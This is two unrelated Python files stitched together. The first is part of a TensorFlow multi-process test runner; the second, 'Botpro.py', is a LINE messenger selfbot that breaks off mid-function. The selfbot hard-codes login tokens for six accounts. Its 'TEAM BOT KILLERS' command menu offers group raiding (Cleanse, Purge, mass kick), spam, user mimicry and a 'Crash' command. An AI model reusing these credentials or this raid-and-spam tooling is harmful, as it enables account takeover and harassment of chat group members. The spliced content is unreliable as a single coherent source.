Boolean; whether the subprocess still exists. If the subprocess has
exited, this returns False.
"""
return self.get_process_exit_code(task_type, task_id) is None
def _process_watchdog(self):
"""Simulates a cluster management system.
- If auto_restart is True, it restarts processes that exit with a non-zero
exit code. Note that when join() times out it overrides auto_restart to
False.
- If dependence_on_chief is True, it terminates all processes once the chief
exits. If auto_restart is also True, it only terminates all processes if
the chief exits with a zero exit code; otherwise it restarts the chief.
This runs in self._watchdog_thread.
"""
while True:
time.sleep(1)
with self._process_lock:
chief = self._processes.get(('chief', 0), None)
# Terminate the cluster when _dependence_on_chief is True if either:
# - chief has exited with zero exit code.
# - chief has exited with non-zero exit code and self._auto_restart is
# False.
if chief and self._dependence_on_chief and chief.exitcode is not None:
if chief.exitcode == 0 or (not self._auto_restart):
for p in self._processes.values():
# Give other processes a chance to exit on their own.
p.join(timeout=3)
self._terminate_all()
for p in self._processes.values():
p.join()
return
# Auto restart failed processes if self._auto_restart is True.
if self._auto_restart:
has_failure = False
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None and p.exitcode != 0:
has_failure = True
logging.info('Restarting failed %s-%d', task_type, task_id)
self._start_subprocess_and_reading_thread(task_type, task_id)
if has_failure:
continue
# Exit the thread if all processes have exited at this point.
if all(p.exitcode is not None for p in self._processes.values()):
return
def _reraise_if_subprocess_error(self, process_statuses):
for process_status in process_statuses.values():
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
process_status.exc_info[1].mpr_result = self._get_mpr_result(
process_statuses)
six.reraise(*process_status.exc_info)
def join(self, timeout=_DEFAULT_TIMEOUT_SEC):
"""Joins all the processes with timeout.
If any of the subprocesses has not exited approximately `timeout`
seconds after the `join` call, this raises a
`SubprocessTimeoutError`.
Note: At timeout, it uses SIGTERM to terminate the subprocesses, in order to
log the stack traces of the subprocesses when they exit. However, this
results in timeout when the test runs with tsan (thread sanitizer); if tsan
is being run on the test targets that rely on timeout to assert information,
`MultiProcessRunner.terminate_all()` must be called after `join()`, before
the test exits, so the subprocesses are terminated with SIGKILL, and data
race is removed.
Args:
timeout: if set and not all processes report status within roughly
`timeout` seconds, a `SubprocessTimeoutError` exception will be raised.
Returns:
A MultiProcessRunnerResult object, which has two attributes,
`return_value` and `stdout`. `return_value` always contains the return
values from the subprocesses. If the `list_stdout` argument is True at
`__init__`, `stdout` contains a list of all messages from the
subprocesses' stdout and stderr.
Raises:
SubprocessTimeoutError: if not all processes report status approximately
within `timeout` seconds. When this is raised, a
`MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute, which has the same
structure as above 'Returns' section describes.
UnexpectedSubprocessExitError: If any of the subprocesses did not exit
properly (for example, they exit on SIGTERM or SIGKILL signal). When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes. If `max_run_time`
is not `None`, it is expected that some subprocesses may be
force-killed when `max_run_time` is up, and this is raised in those
cases.
Exception: if there is an Exception propagated from any subprocess. When
this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute, which has the
same structure as above 'Returns' section describes.
"""
with self._process_lock:
if self._joined:
raise ValueError("MultiProcessRunner can't be joined twice.")
self._joined = True
self._watchdog_thread.join(timeout)
if self._watchdog_thread.is_alive():
# Timeout. Force termination to dump worker processes stack trace.
with self._process_lock:
self._auto_restart = False
logging.error('Timeout when joining for child processes. Terminating...')
self.terminate_all(sig=signal.SIGTERM)
# Wait for the processes to terminate by themselves first, so they have a
# chance to dump stacktraces. After _FORCE_KILL_WAIT_SEC, we SIGKILL them.
self._watchdog_thread.join(_FORCE_KILL_WAIT_SEC)
if self._watchdog_thread.is_alive():
logging.error('Timeout when waiting for child processes to '
'print stacktrace. Sending SIGKILL...')
self.terminate_all()
self._watchdog_thread.join()
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
raise SubprocessTimeoutError('one or more subprocesses timed out.',
self._get_mpr_result(process_statuses))
for (task_type, task_id), p in self._processes.items():
logging.info('%s-%d exit code: %s', task_type, task_id, p.exitcode)
process_statuses = self._get_process_statuses()
self._reraise_if_subprocess_error(process_statuses)
# Checking all the processes that are expected to exit properly.
for (task_type, task_id), p in self._processes.items():
# Successfully exiting process has exit code 0. We ignore processes that
# are terminated.
assert p.exitcode is not None
if (p.exitcode > 0 and (task_type, task_id) not in self._terminated):
raise UnexpectedSubprocessExitError(
'Subprocess %s-%d exited with exit code %s. See logs for details.'
% (task_type, task_id, p.exitcode),
self._get_mpr_result(process_statuses))
logging.info('Joining log reading threads.')
for thread in self._reading_threads:
thread.join()
logging.info('Joined log reading threads.')
# Clear the alarm.
signal.alarm(0)
return self._get_mpr_result(process_statuses)
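  # Hedged usage sketch for start()/join() (the names below are illustrative,
  # not part of this module):
  #   mpr = MultiProcessRunner(proc_func, cluster_spec, list_stdout=True)
  #   mpr.start()
  #   try:
  #     result = mpr.join(timeout=60)
  #   except SubprocessTimeoutError as e:
  #     result = e.mpr_result  # partial stdout/return values are still available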
def _get_mpr_result(self, process_statuses):
stdout = self._queue_to_list(self._streaming_queue)
return_values = []
for process_status in process_statuses.values():
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return MultiProcessRunnerResult(stdout=stdout, return_value=return_values)
def terminate(self, task_type, task_id):
"""Terminates the process with `task_type` and `task_id`.
If auto_restart=True, the terminated task will be restarted unless the chief
has already exited with zero exit code.
Args:
task_type: the task type.
task_id: the task id.
"""
with self._process_lock:
p = self._processes.get((task_type, task_id), None)
if p is None:
raise ValueError('{}-{} does not exist'.format(task_type, task_id))
self._terminated.add((task_type, task_id))
# TODO(crccw): change to use Process.terminate() as well.
self._parent_to_sub_queue.put('terminate {} {}'.format(
task_type, task_id))
p.join()
def _terminate_all(self, sig=None):
"""Terminates all subprocesses.
The caller is required to hold self._process_lock.
Args:
sig: the signal used to terminate the process. The default is SIGKILL.
"""
# Use SIGKILL as the default. On systems where it's unavailable, such as
# Windows, use SIGTERM.
sig = sig or getattr(signal, 'SIGKILL', signal.SIGTERM)
for (task_type, task_id), p in self._processes.items():
if p.exitcode is not None:
continue
try:
os.kill(p.pid, sig)
self._terminated.add((task_type, task_id))
logging.info('%s-%d terminated with signal %r.', task_type, task_id,
sig)
except ProcessLookupError:
logging.info('Attempting to kill %s-%d but it does not exist.',
task_type, task_id)
def terminate_all(self, sig=None):
"""Terminates all subprocesses."""
with self._process_lock:
self._terminate_all(sig)
class _Process(multi_process_lib.Process):
"""A modified `multiprocessing.Process` that can set up environment variables."""
# TODO(crccw): consider moving other logic in _ProcFunc to _Process.
def __init__(self, test_env, **kwargs):
super(_Process, self).__init__(**kwargs)
self._test_env = test_env
self._actual_run = getattr(self, 'run')
self.run = self._run_with_setenv
def _run_with_setenv(self):
# We need to set environment variables before doing anything because
# setenv() is not thread-safe.
test_env = self._test_env
if test_env.grpc_fail_fast is not None:
os.environ['GRPC_FAIL_FAST'] = str(test_env.grpc_fail_fast)
_set_tf_config(test_env.task_type, test_env.task_id, test_env.cluster_spec,
test_env.rpc_layer)
return self._actual_run()
class _ProcFunc(object):
"""Represents a callable to run in a subprocess."""
@contextlib.contextmanager
def _runtime_mode(self, executing_eagerly):
if executing_eagerly:
with context.eager_mode():
yield
else:
with context.graph_mode():
yield
def _message_checking_func(self, task_type, task_id):
"""A function that regularly checks messages from parent process."""
# TODO(rchao): Remove this once parent uses SIGKILL to terminate subprocess.
while True:
try:
message = self._resources.parent_to_sub_queue.get(block=False)
# Currently the only possible message is termination.
if not message.startswith('terminate'):
raise ValueError('Unrecognized message: {}'.format(message))
if message == 'terminate {} {}'.format(task_type, task_id):
break
else:
# If the message is not targeting this process, put it back to the
# queue.
self._resources.parent_to_sub_queue.put(message)
time.sleep(1)
except Queue.Empty:
time.sleep(0.1)
self._resources.process_status_queue.put(
_ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=True,
exc_info=None,
return_value=None))
# `os._exit(1)` is used to more reliably terminate a subprocess.
os._exit(1) # pylint: disable=protected-access
def _close_streaming(self):
"""Close stdout, stderr and streaming pipe.
We need to close them explicitly so that the reading threads in the main
process can exit more quickly, since TensorFlow may take a while to exit.
"""
sys.stdout.flush()
sys.stderr.flush()
sys.stdout.close()
sys.stderr.close()
self._resources.streaming_pipe_w.close()
def __call__(self, resources, test_env, proc_func, args, kwargs,
use_dill_for_args):
"""The wrapper function that actually gets run in child process(es)."""
global _barrier
self._resources = resources
_barrier = self._resources.barrier
proc_func = dill.loads(proc_func)
if use_dill_for_args:
args = dill.loads(args)
kwargs = dill.loads(kwargs)
if faulthandler is not None:
faulthandler.enable()
faulthandler.register(signal.SIGTERM, chain=True)
# All logging should go to stderr to be streamed to the main process.
logging.set_stderrthreshold(logging.DEBUG)
# Assign sys.stdout and sys.stderr as duplicates of `streaming_pipe_w` so
# print() and logging.*() write directly to `streaming_pipe_w`.
# Unfortunately, since we cannot prepend task_type and task_id information to
# the streamed logs, we need a thread per subprocess to distinguish
# which subprocess each piece of output came from.
os.dup2(resources.streaming_pipe_w.fileno(), sys.stdout.fileno())
os.dup2(resources.streaming_pipe_w.fileno(), sys.stderr.fileno())
pid = os.getpid()
logging.info('Subprocess with PID %d (%s, %d) is now being started.', pid,
test_env.task_type, test_env.task_id)
# The thread will be dedicated to checking messages from the parent process.
threading.Thread( # pylint: disable=unexpected-keyword-arg
target=self._message_checking_func,
args=(test_env.task_type, test_env.task_id),
daemon=True).start()
if test_env.v2_enabled:
v2_compat.enable_v2_behavior()
with self._runtime_mode(test_env.executing_eagerly):
info = _run_contained(test_env.task_type, test_env.task_id, proc_func,
args, kwargs)
self._resources.process_status_queue.put(info)
# Re-raise the exception in addition to reporting it to the parent
# process, so that even if `--test_timeout` flag is set and the
# error doesn't make it to be shown in parent process before bazel's
# timeout, the log would still show what happens in this subprocess,
# instead of silently suppressing the error due to early bazel
# timeout. Raising an error in the subprocess produces stack trace in
# the log, but the program continues running.
if not info.is_successful:
six.reraise(*info.exc_info)
self._close_streaming()
# Exit with code 0 as it's considered successful exit at this point.
sys.exit(0)
class MultiProcessPoolRunner(object):
"""A utility class to start a process pool to simulate a cluster.
It's similar to MultiProcessRunner, but uses a pool of processes to avoid the
expensive initialization cost of TensorFlow.
"""
def __init__(self, cluster_spec, initializer=None):
"""Creates a multi-process pool runner.
Args:
cluster_spec: Dict for cluster spec. The following is an example of
cluster with three workers.
{"worker": ["worker0.example.com:2222",
"worker1.example.com:2222",
"worker2.example.com:2222"]}
initializer: a callable to be called at the startup of worker processes.
Raises:
RuntimeError: if `multi_process_runner.test_main()` is not called.
ValueError: if there are more than one chief in the `cluster_spec`.
"""
self._cluster_spec = cluster_spec
self._initializer = initializer
self._conn = {}
self._runner = None
def __del__(self):
self.shutdown()
def shutdown(self):
"""Shuts down the worker pool."""
for conn in self._conn.values():
conn.close()
self._conn = {}
if self._runner is not None:
self._runner.join()
self._runner = None
def _start(self):
"""Starts the worker pool."""
# We need different arguments for different processes, so we pass a
# no-op proc_func here and use start_single_process instead.
#
# We also need to start the pool processes as daemons, so that they don't block
# the program from exiting. Note that __del__ may not get called when
# there's an exception. The user may also store a pool runner in a global
# object to share across test cases.
if dill is None:
raise unittest.SkipTest(
'TODO(b/150264776): Resolve dependency issue in CI')
self._runner = MultiProcessRunner(
proc_func=lambda: None,
cluster_spec=self._cluster_spec,
use_dill_for_args=False,
daemon=True)
if self._initializer:
initializer = dill.dumps(self._initializer, dill.HIGHEST_PROTOCOL)
else:
initializer = None
for task_type, addresses in self._cluster_spec.items():
for task_id, _ in enumerate(addresses):
conn1, conn2 = multiprocessing.Pipe(duplex=True)
self._conn[(task_type, task_id)] = conn1
self._runner.start_single_process(
task_type,
task_id,
proc_func=_pool_runner_worker,
args=(task_type, task_id, initializer, conn2))
def run(self, proc_func, args=None, kwargs=None):
"""Runs `proc_func` with `args` and `kwargs` on all jobs.
Args:
proc_func: The function to be run.
args: Optional positional arguments to be supplied in `proc_func`.
kwargs: Optional keyword arguments to be supplied in `proc_func`.
Returns:
A list of return values.
"""
# TODO(b/150264776): skip in OSS until it's implemented.
multi_process_lib.Process()
if self._runner is None:
self._start()
proc_func = dill.dumps(proc_func, dill.HIGHEST_PROTOCOL)
for conn in self._conn.values():
conn.send((proc_func, args or [], kwargs or {}))
process_statuses = []
for (task_type, task_id), conn in self._conn.items():
logging.info('Waiting for the result from %s-%d', task_type, task_id)
try:
process_statuses.append(conn.recv())
except EOFError:
# This shouldn't happen due to exceptions in proc_func, since those are
# caught and returned through `conn`; it usually means a bug in the runner.
self.shutdown()
raise RuntimeError('Unexpected EOF. Worker process may have died. '
                   'Please report a bug.')
return_values = []
for process_status in process_statuses:
assert isinstance(process_status, _ProcessStatusInfo)
if not process_status.is_successful:
six.reraise(*process_status.exc_info)
if process_status.return_value is not None:
return_values.append(process_status.return_value)
return return_values
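  # Hedged usage sketch for the pool runner (the cluster spec below is
  # illustrative):
  #   pool = MultiProcessPoolRunner({'worker': ['localhost:2222', 'localhost:2223']})
  #   return_values = pool.run(lambda: 2 + 2)  # one value per worker, e.g. [4, 4]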
def _pool_runner_worker(task_type, task_id, initializer, conn):
"""Function that runs on the workers in a pool.
It listens for callables to run and returns the results until `conn` is closed.
It captures any exception raised while executing the callable and returns it
through `conn`.
Args:
task_type: the task type.
task_id: the task index.
initializer: a callable to execute during startup.
conn: a multiprocessing.Connection object to listen for tasks and send
results.
"""
if initializer:
initializer = dill.loads(initializer)
initializer()
while True:
try:
proc_func, args, kwargs = conn.recv()
except EOFError:
break
proc_func = dill.loads(proc_func)
info = _run_contained(task_type, task_id, proc_func, args, kwargs)
sys.stdout.flush()
sys.stderr.flush()
conn.send(info)
def _run_contained(task_type, task_id, proc_func, args, kwargs):
"""Runs `proc_func` with `args` and `kwargs`.
The function returns _ProcessStatusInfo which captures the return value and
the exception.
Args:
task_type: the task type.
task_id: the task index.
proc_func: the function to be run.
args: optional positional arguments to be supplied in `proc_func`.
kwargs: optional keyword arguments to be supplied in `proc_func`.
Returns:
a _ProcessStatusInfo.
"""
is_successful = False
return_value = None
exc_info = None
try:
return_value = proc_func(*args, **kwargs)
is_successful = True
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
# If `proc_func` ends up exiting with `sys.exit()`, the `SystemExit` is not
# handled here.
except Exception: # pylint: disable=broad-except
exc_info = sys.exc_info()
return _ProcessStatusInfo(
task_type=task_type,
task_id=task_id,
is_successful=is_successful,
exc_info=exc_info,
return_value=return_value)
class SubprocessTimeoutError(RuntimeError):
"""An error that indicates there is at least one subprocess timing out.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`SubprocessTimeoutError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(SubprocessTimeoutError, self).__init__(msg)
self.mpr_result = mpr_result
class UnexpectedSubprocessExitError(RuntimeError):
"""An error indicating there is at least one subprocess with unexpected exit.
When this is raised, a `MultiProcessRunnerResult` object can be retrieved by
`UnexpectedSubprocessExitError`'s mpr_result attribute. See
`MultiProcessRunner.join()` for more information.
"""
def __init__(self, msg, mpr_result):
super(UnexpectedSubprocessExitError, self).__init__(msg)
self.mpr_result = mpr_result
def _set_tf_config(task_type, task_id, cluster_spec, rpc_layer=None):
"""Set TF_CONFIG environment variable."""
tf_config_dict = {
'cluster': cluster_spec,
'task': {
'type': task_type,
'index': task_id,
},
}
if rpc_layer is not None:
tf_config_dict['rpc_layer'] = rpc_layer
os.environ['TF_CONFIG'] = json.dumps(tf_config_dict)
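# For illustration, a call such as
#   _set_tf_config('worker', 0, {'worker': ['localhost:2222']}, rpc_layer='grpc')
# leaves TF_CONFIG set to the JSON string:
#   {"cluster": {"worker": ["localhost:2222"]},
#    "task": {"type": "worker", "index": 0}, "rpc_layer": "grpc"}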
def run(proc_func,
cluster_spec,
rpc_layer=None,
max_run_time=None,
grpc_fail_fast=None,
stream_stdout=True,
list_stdout=False,
timeout=_DEFAULT_TIMEOUT_SEC,
args=None,
kwargs=None): # pylint: disable=g-doc-args
"""Runs functions in local child processes.
It is a convenience method that creates a `MultiProcessRunner` object and
invokes `start` and `join` method. Please see these methods for detailed
documentations.
Returns:
A MultiProcessRunnerResult object returned from `MultiProcessRunner.join()`.
"""
runner = MultiProcessRunner(
proc_func,
cluster_spec,
rpc_layer,
max_run_time=max_run_time,
grpc_fail_fast=grpc_fail_fast,
stream_stdout=stream_stdout,
list_stdout=list_stdout,
args=args,
kwargs=kwargs)
runner.start()
return runner.join(timeout)
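# Hedged usage sketch for `run` (the proc_func and cluster spec below are
# illustrative):
#   result = run(
#       proc_func=lambda: print('hello from a worker'),
#       cluster_spec={'worker': ['localhost:2222', 'localhost:2223']},
#       list_stdout=True)
#   print(result.return_value)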
# This is set by MultiProcessRunner in worker processes.
_barrier = None
def barrier():
if _barrier is None:
raise ValueError(
    'barrier is not defined. It is likely because you are calling barrier() '
    'in the main process. barrier() can only be called in the subprocesses.'
)
return _barrier
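# Hedged usage sketch: inside a proc_func run by MultiProcessRunner, tasks can
# synchronize on the shared barrier (illustrative only):
#   def proc_func():
#     do_per_task_setup()
#     multi_process_runner.barrier().wait()  # block until every task reaches here
#     do_collective_work()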
_manager = None
_manager_lock = threading.Lock()
def manager():
"""Returns the multiprocessing manager object for concurrency tools.
The manager object is useful as it controls a server process that holds
the python objects that can be shared across processes. This can be used
for parent-subprocess communication:
```python
manager = multi_process_runner.manager()
some_event_happening_in_subprocess = manager.Event()
mpr = multi_process_runner.MultiProcessRunner(proc_func, cluster_spec,
args=(some_event_happening_in_subprocess,))
mpr.start()
some_event_happening_in_subprocess.wait()
# Do something that should only happen after some event occurs in the subprocess.
```
Note that the user of multi_process_runner should not create additional
`multiprocessing.Manager()` objects; doing so can result in a segfault in
some cases.
This method should only be called after multi_process_runner.test_main() is
called.
"""
global _manager
with _manager_lock:
if _manager is None:
_manager = multiprocessing.Manager()
return _manager
def test_main():
"""Main function to be called within `__main__` of a test file."""
multi_process_lib.test_main()
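# Hedged usage sketch: a test module using this runner ends with test_main()
# instead of tf.test.main() or unittest.main():
#   if __name__ == '__main__':
#     multi_process_runner.test_main()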
|
Botpro.py | # -*- coding: utf-8 -*-
#ღḯḉḯη-тєαм
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
#tinkerbell
cl = LINETCR.LINE()
cl.login(token="EnpqimxsRooeJalqyqe5.nqZhqiZgZilGvU4eyth5jq.y/9smR2c76SyZ9a5oo+RC7IMFj2s9FTIaPD7rWVc0J0=")
cl.loginResult()
#vidia
kt = LINETCR.LINE()
kt.login(token="Eni9sF6Ns15fgAXSGV87.7aNdCEtbMUaAO9Hiv0qoTW.ZIA01S8p0+qqLPs4i/Zu0/AppknZwHFR4JTn25xOT9k=")
kt.loginResult()
#rosetta
ks = LINETCR.LINE()
ks.login(token="EnceHaf6Iy4MCqraHlxc.SJRuNecAXNC8sHurfor2ha.KZqwwycOz6ezjEONNvFMa4V/Z31GMPj5pHQxe9YVVr0=")
ks.loginResult()
#sirvelmist
ki = LINETCR.LINE()
ki.login(token="EnuXybuLxQJxyKzha44d.6WqeC+1pukOllkvQ7Oglhq.3TRa/cgN7HQ4nELvyUYeTNTDzJCDQCGf951tq/HEwpo=")
ki.loginResult()
#fawn
kk = LINETCR.LINE()
kk.login(token="EnWNC28GvfH2C6GY6T32.ZNOnP4uou95euS+Ku1ce4G.ot5wRrwav0m3VQOplLE7O03pnxSPL0wA5GRMR01LueI=")
kk.loginResult()
#iridessa
kc = LINETCR.LINE()
kc.login(token="EnH1CxYghH02JEyzbgjd.6WqeC+1pukOllkvQ7Oglhq./Se/mP9P2L5aQrGPokBeszrw5h/MCvvSeAftmugtWlQ=")
kc.loginResult()
#kicker ghost
#kl = LINETCR.LINE()
#kl.login(token="")
#kl.loginResult()
print "ღḯḉḯη-тєαм"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage="""TEAM BOT KILLERS
➡➡➡MODIFICATION⬅⬅⬅
⏳Bot1 rename:[text]
⌛Bot2 rename:[text]
⌛Bot3 rename:[text]
͜⌛Bot4 rename:[text]
⌛Bot5 rename:[text]
⌛Bot6 rename:[text]
⌛All rename:[text]
⌛Allbio:[text]
⌛Bot1 clone @[name]
⌛Bot2 clone @[name]
⌛Bot3 clone @[name]
⌛Bot4 clone @[name]
⌛Bot5 clone @[name]
⌛Bot6 clone @[name]
⌛Comment:[text]
⌛Message:[text]
⌛Bot1-6 backup run
⌛Bot1-6 backup
⌛Group name:[text]
********************
🔏THE TEAM BOT KILLERS🔏
====================
💣Admin on @[name]
💣Expel on @[name]
💣Expelall
==================
MODE 0N/OFF
💣Protect:low
💣Protect:high
===================
🔏THE TEAM BOT KILLERS🔏
*******************
➡➡LISTKEYWORD
♻Ban @[name]
♻Unban @[name]
♻Ban group:
♻Del ban:
♻List ban group
♻Banned[send contact]
♻Unbanned[send contact]
♻Ban repeat @[name]
♻Blacklist all
♻Ban cek
♻Clear banlist
♻Mimic target @[name]
♻Mimic untarget @[name]
♻Add friend @[name]
♻Target @[name]
♻Del target @[name]
♻Target list
******************
🔏THE TEAM BOT KILLERS🔏
===================
----SC-INVITE-----
⛔Invite:[mid]
⛔Invite user[contact]
⛔Invite me
⛔Join all
⛔Join group
===================
🔏THE TEAM BOT KILLERS🔏
*******************
---LEAVE GC COMMANDS---
💡Bot2 @bye
💡Bot3 @bye
💡Bot4 @bye
💡Bot5 @bye
💡Bot6 @bye
💡Bye all
💡Center @bye
💡Bye allgroups[own]
💡Leave group:
====================
🔏THE TEAM BOT KILLERS🔏
********************
---SETTING BOT----
🔏Auto join:on/off
🔐Auto leave:on/off
🔏Auto like:on/off
🔏Welcome message:on/off
🔏Auto notice:on/off
🔏Blockinvite:on/off
🔏Auto blockqr:on/off
🔏Namelock:on/off
🔏Mimic:on/off
🔏Auto add:on/off
🔏Check message
🔏Add message:[text]
🔏Comment:on/off
🔏Add comment:[text]
🔐Check comment
🔐Backup:on/off
🔐Gcancel:[number]
🔐Update welcome:[text]
🔐Check welcome message
=======================
🔒THE TEAM BOT KILLERS🔒
=======================
====CANCEL COMMANDS===
🚫Rejectall
🚫Clean invites
🚫Clear invites
**********************
🔏THE TEAM BOT KILLERS🔏
======================
=== Gift Functions ===
💥gift1-15
💥Spam gift
**********************
🔏THE TEAM BOT KILLERS🔏
======================
---- LIST NOTICE ---
💯Group list
💯Banlist
💯Admin list
💯Settings
💯Ginfo
💯TL:[text]
💯Mimic list
💯Details grup:
💯Crash
💯Add all
=====================
🔏THE TEAM BOT KILLERS🔏
*********************
=== MOD KICK ===
💮Cleanse
💮Vkick @
💮Nk [name]
💮Kick:[mid]
💮Purge
💮Ulti
💮Recover
*********************
➡➡THE TEAM BOT KILLERS⬅⬅
=====================
~~~ GROUP CHAT FUNCTIONS ~~~
🔍Spamg[on/off][no][txt]
🔍Spam add:[text]
🔍Spam change:[text]
🔍Spam start:[number]
🔍Say [text]
🔍Me
🔍Speed
🔍Debug speed
🔍My mid
🔍Gcreator
🔎Halo
🔎Bot contact
🔎Bot mid
🔎Creator
🔎System
🔎Iconfig
🔎Kernel
🔎Cpu
🔎Responsename
🔎Help
🔎Mc:[mid]
********************
➡➡THE TEAM RENDY KILLS⬅⬅
====================
=== ULTI FUNCTIONS ===
🔏Lurking
🔏Lurking result
🔏Setlastpoint
🔏Viewlastseen
🔏Link open
🔏Link close
🔏Gurl
🔏Remove chat
🔏Bot restart
=====================
➡➡THE TEAM BOT KILLER⬅⬅
*********************
~~~ CHAT FUNCTIONS ~~~
🎼Lyric [][]
🎼Music [][]
🎼Wiki [text]
🎼Vidio [text]
🎼Youtube [text]
🎼Instagram [text]
🎼Translate-idn [text]
🎼Translate-eng [text]
🎼Translate-thai [text]
🎼Translate-japan [text]
🎼Emoji [expression]
🎼Info @[name]
🎼Ping
🎼Time
🎼apakah
🎼Sticker [expression]
🎼Mention
🎼/say
🎼/say-en
🎼/say-jp
🎼Dosa @
🎼/
🎼Siapa
********************
🔒THE TEAM BOT KILLS🔒
===================
~~~ BROADCAST (BC) FUNCTIONS ~~~
📧Pm cast [text]
📧Broadcast [text]
📧Spam @[name]
====================
➡➡➡THE TEAM RENDY KILLS⬅⬅⬅
********************
===COMMAND BOT===
🔏Turn off bots
********************
====================
➡➡➡THANKS TO MY FRIENDS⬅⬅⬅
====================
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid    # u350cc7408cc6cc82e056ee046131f925
Amid = ki.getProfile().mid   # uec09c371e4c19ae01aa3d84857440eb7
Bmid = kk.getProfile().mid   # ub23ad49c409ac6773c4a151114e4761c
Cmid = kc.getProfile().mid   # ueb040473fd4f50aa0b2ca56aee818b1d
Dmid = ks.getProfile().mid   # uce7a0da7850e53de4452cfe4535084e2
Emid = kt.getProfile().mid   # ub51bc97c5e4f603f1dff35e9512550d3
#Fmid = kl.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,"u350cc7408cc6cc82e056ee046131f925","uec09c371e4c19ae01aa3d84857440eb7","ub23ad49c409ac6773c4a151114e4761c","ueb040473fd4f50aa0b2ca56aee818b1d","uce7a0da7850e53de4452cfe4535084e2","ub51bc97c5e4f603f1dff35e9512550d3"]
admin = ["u350cc7408cc6cc82e056ee046131f925","ub51bc97c5e4f603f1dff35e9512550d3"]
owner = ["u350cc7408cc6cc82e056ee046131f925","ub51bc97c5e4f603f1dff35e9512550d3"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by TBK[TEAM BOT KILLERS]",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
wait3 = {
"copy":False,
"copy2":"target",
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
# Snapshot each bot's profile fields (displayName, statusMessage, pictureStatus)
# so they can be restored later.
for bot in KAC:
    contact = bot.getProfile()
    backup = bot.getProfile()
    backup.displayName = contact.displayName
    backup.statusMessage = contact.statusMessage
    backup.pictureStatus = contact.pictureStatus
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
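# NOTE: `album` and `image_path` must be defined by the caller (e.g. as
# globals); they are not defined anywhere in this file.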
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def mention(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "[Command] Tag All"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
